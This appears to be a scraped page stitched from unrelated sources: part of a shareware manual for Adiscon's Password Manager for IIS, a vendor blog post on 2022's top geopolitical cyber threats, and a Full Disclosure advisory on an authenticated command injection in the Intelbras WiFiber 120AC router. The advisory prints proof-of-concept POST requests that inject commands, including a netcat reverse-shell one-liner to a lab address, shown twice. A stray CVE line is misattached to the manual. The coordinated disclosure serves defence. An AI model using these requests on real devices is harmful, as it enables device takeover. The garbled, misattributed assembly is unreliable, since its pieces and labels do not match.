Fields "New Password" and "New Password Confirm" do not match.

**Version History**

This short history shall provide you with some background information about the versions available as well as their pros and cons.

**1.0**

This is the initial release.

**1.1**

Some minor bug fixes.

**2.0**

*   Fully compatible with Windows 2000 (tested with build 2072)
*   Error Reporting Improved (less "error xx occured")
*   Portugese Language versions available
*   Paramter "RESULTURL" added. This allows to fully customize the whole change password process.

**How to obtain Updates**

Please visit our web site http://www.Adiscon.com for information about new and updated products. Registered users will receive notification of new versions via email. The registration is valid for the current major release as well as the next one (in this case 3.0).

**License**

Password Manager for IIS is distributed as **Shareware**. You are free to use the product for evaluation. However, if you feel comfortable with it and plan to use it for an extended period of time, you must **register** with Adiscon and pay the license fee.

We do not want to restrict the length of the evaluation period by some kind of software mechanism. However, we think an evaluation period of 1 month should be reasonable for all parties interested.

Please support further development by registering the product. There is a license fee per Windows NT system Password Manager for IIS is running on. You need only one license per machine, even if you run multiple virtual servers on a single machine or have multiple CPUs inside it.

For orders outside of Germany, the licnse fee is $US 89 (plus tax if applicable). EU residents with VAT identification number should state this number in order to get an tax exemption. If not stated, full VAT will be charged. All EU orders will be processed in Euro. US$ payment is available for international customers, only.

Please call for volume orders.

BBS sysops feel free to include the distribution set of this product in your library. Please be sure to include the full set (program & this documentation). Any questions can be directed at Info@Adiscon.com.

**Are there any restrictions in the unregistered version?**

Nope - we don't like "crippleware". However, the unregistred version does identify itself as unregistered in its responses to password change requests. Based on experience we needed to introduced a slight delay whith the RESULTURL version - if we hadn't done this, nobody would ever see the "unregistered" message. We think this is fair.

**How to register**

Registration is as simple as 1-2-3:

1.  Print out the following registration form
2.  Please fill it in. Remember to include number of licenses requested and payment information **as well as your email id**.
3.  Mail or fax the registration form to Adiscon.

We accept cash (bills please - and: no faxed ones, please ;-) ) as well as MasterCard/Eurocard or American Express cards. We also accept payment by check if - and only if - the following criteria is met:

If you are paying in US$, your check must be drawn on an US American bank and made payable to "Rainer Gerhards" (very important, do not make payable to Adiscon GmbH!).

We are currently working on secure online payment systems.

If you need an additional payment options, please contact us at Info@Adiscon.com or the below given addresses. Please note that - for your security - we generally do not accept email registrations. We strongly encourage you **never** to transmit your credit card information in clear text over the Internet.

Direct your registrations to:

Adiscon GmbH  
Franz-Marc Strasse 144  
50374 Erftstadt  
Germany

Fax: +49-9349-928820  
email: Info@Adiscon.com  
Web: http://www.Adiscon.com

Due to German laws all credit card orders need to be processed in DEM. US$ payments will be converted to DEM according to current exchange rate. There might be a slight difference in the converted value due to exchange rate differences.

**Registration / Order Form**

**Password Manager for IIS  
Registration / Order**

Company

 

**Name**

 

Address

 

Country

 

Phone

 

Fax

 

**email**

 

VAT registration number (EU residents only)

 

**Nbr. of Licenses**

 

**Payment**

o Cash o MasterCard o American Express o Check  
o JCB  o VISA 

**Price**

 

**Credit Card Information**

Card Number: \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Cardholder Name (as imprinted on card): \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Expiration Date \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Please be sure to specify your email address, number of licenses requested and payment information (fields in bold typeface).

Please sign below:

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_  
Date & Signature

and forward this form to

Adiscon GmbH  
Paul-Klee-Str. 7  
50374 Erftstadt  
Germany

Fax: +49-2235-985032  
Fax option for MasterCard orders, only.

**Liability**

Please use the evaluation period to check if Password Manager for IIS is suitable for you and your system environment. We encourage you to try the product in a test environment. We accept no liability for any damage during the evaluation period.

Liability for registered users is limited to the amount of the registration fee.

**Copyrights**

This documentation as well as the actual Password Manager for IIS product is copyrighted by Adiscon GmbH, Germany.

Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corp., Redmond, WA, USA.

**Other Products of Interest**

You might be interested in other fine system management tools from Adiscon. Be sure to have a look at our products at http://www.Adiscon.com.

CVE-2022-36664: Password Manger for IIS * User Manual * Version 1.0

As we are nearing the end of 2022, looking at the most concerning threats of this turbulent year in terms of testing numbers offers a threat-based perspective on what triggers cybersecurity teams to check how vulnerable they are to specific threats. These are the threats that were most tested to validate resilience with the Cymulate security posture management platform between January 1st and

As we are nearing the end of 2022, looking at the most concerning threats of this turbulent year in terms of testing numbers offers a threat-based perspective on what triggers cybersecurity teams to check how vulnerable they are to specific threats. These are the threats that were most tested to validate resilience with the Cymulate security posture management platform between January 1st and December 1st, 2022.

**Manjusaka****Date published: August 2022**

Reminiscent of Cobalt Strike and Sliver framework (both commercially produced and designed for red teams but misappropriated and misused by threat actors), this emerging attack framework holds the potential to be widely used by malicious actors. Written in Rust and Golang with a User Interface in Simple Chinese (see the workflow diagram below), this software is of Chinese origin.

Manjasuka carries Windows and Linux implants in Rust and makes a ready-made C2 server freely available, with the possibility of creating custom implants.

**Geopolitical context**

Manjasuka was designed for criminal use from the get-go, and 2023 could be defined by increased criminal usage of it as it is freely distributed and would reduce criminal reliance on the misuse of commercially available simulation and emulation frameworks such as Cobalt Strike, Sliver, Ninja, Bruce Ratel C4, etc.

At the time of writing, there was no indication that the creators of Manjasuka are state-sponsored but, as clearly indicated below, China has not been resting this year.

**PowerLess Backdoor****Date published: February 2022**

Powerless Backdoor is the most popular of this year Iran-related threats, designed to avoid PowerShell detection. Its capabilities include downloading a browser info stealer and a keylogger, encrypting and decrypting data, executing arbitrary commands, and activating a kill process.

**Geopolitical context**

The number of immediate threats attributed to Iran has jumped from 8 to 17, more than double of the similar 2021 period. However, it has slowed considerably since the September 14th U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) sanctions against Iranian cyber actors, trickling down to a single attack imputed to Iran since then.

The current political tensions within Iran will no doubt impact the frequency of attacks in 2023, but at this stage, it is difficult to evaluate whether those will increase or decrease.

**APT 41 targeting U.S. State Governments****Date published: March 2022**

Already flagged as very active in 2021, APT41 is a Chinese state-sponsored attacker group activity that showed no sign of slowing down in 2022, and investigations into APT41 activity uncovered evidence of a deliberate campaign targeting U.S. state governments.

APT 41 uses reconnaissance tools, such as Acunetix, Nmap, SQLmap, OneForAll, subdomain3, subDomainsBrute, and Sublist3r. It also launches a large array of attack types, such as phishing, watering hole, and supply-chain attacks, and exploits various vulnerabilities to initially compromise their victims. More recently, they have been seen using the publicly available tool SQLmap as the initial attack vector to perform SQL injections on websites.

This November, a new subgroup, Earth Longhi, joined the already long list of monikers associated with APT 41 (ARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon). Earth Longhi was spotted targeting multiple sectors across Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine.

**Geopolitical context**

According to Microsoft digital Defense Report 2022, "Many of the attacks coming from China are powered by its ability to find and compile "zero-day vulnerabilities" – unique unpatched holes in software not previously known to the security community. China's collection of these vulnerabilities appears to have increased on the heels of a new law requiring entities in China to report vulnerabilities they discover to the government before sharing them with others."

**LoLzarus Phishing Attack on DoD Industry****Date published: February 2022**

Dubbed LolZarus, a phishing campaign attempted to lure U.S. defense sector job applicants. This campaign was initially identified by Qualys Threat Research, which attributed it to the North-Korean threat actor Lazarus (AKA Dark Seoul, Labyrinth Chollima, Stardust Chollima, BlueNoroff, and APT 38). Affiliated with North Korea's Reconnaissance General Bureau, this group is both politically and financially motivated and were best known for the high profile attack on Sondy in 2016 and WannaCry ransomware attack in 2017.

The LolZarus phishing campaign relied on at least two malicious _documents, Lockheed\_Martin\_JobOpportunities.docx_ and _salary\_Lockheed\_Martin\_job\_opportunities\_confidential.doc,_ that abused macros with aliases to rename the API used and relied on ActiveX Frame1\_Layout to automated the attack execution. The macro then loaded the WMVCORE.DLL Windows Media dll file to help deliver the second stage shellcode payload aimed at hijacking control and connecting with the Command & Control server.

**Geopolitical context**

Another two North Korean notorious attacks flagged by CISA this year include the use of Maui ransomware and activity in cryptocurrency theft. Lazarus subgroup BlueNoroff seems to have branched out of cryptocurrency specialization this year to also target cryptocurrency-connected SWIFT servers and banks. Cymulate associated seven immediate threats with Lazarus since January 1st, 2022.

**Industroyer2****Date published: April 2022**

Ukraine's high-alert state, due to the conflict with Russia, demonstrated its efficacy by thwarting an attempted cyber-physical attack targeting high-voltage electric substations. That attack was dubbed Industroyer2 in memory of the 2016's Industroyer cyber-attack, apparently targeting Ukraine power stations and minimally successful, cutting the power in part of Kyiv for about one hour.

The level of Industroyer2 customized targeting included statically specified executable file sets of unique parameters for specific substations.

**Geopolitical context**

Ukraine's cyber-resilience in protecting its critical facilities is unfortunately powerless against kinetic attacks, and Russia appears to have now opted for more traditional military means to destroy power stations and other civilian facilities. According to ENISA, a side-effect of the Ukraine-Russia conflict is a recrudescence of cyber threats against governments, companies, and essential sectors such as energy, transport, banking, and digital infrastructure, in general.

In conclusion, as of the five most concerning threats this year, four have been directly linked with state-sponsored threat actors and the threat actors behind the fifth one are unknown, it appears that geopolitical tensions are at the root of the most burning threat concerns for cybersecurity teams.

As state-sponsored attackers typically have access to cyber resources unattainable by most companies, pre-emptive defense against complex attacks should concentrate on security validation and continuous processes focused on identifying and closing in-context security gaps.

_Note: This article was written and contributed by David Klein, Cyber Evangelist at Cymulate._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

2022 Top Five Immediate Threats in Geopolitical Context

Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

Tag

#sap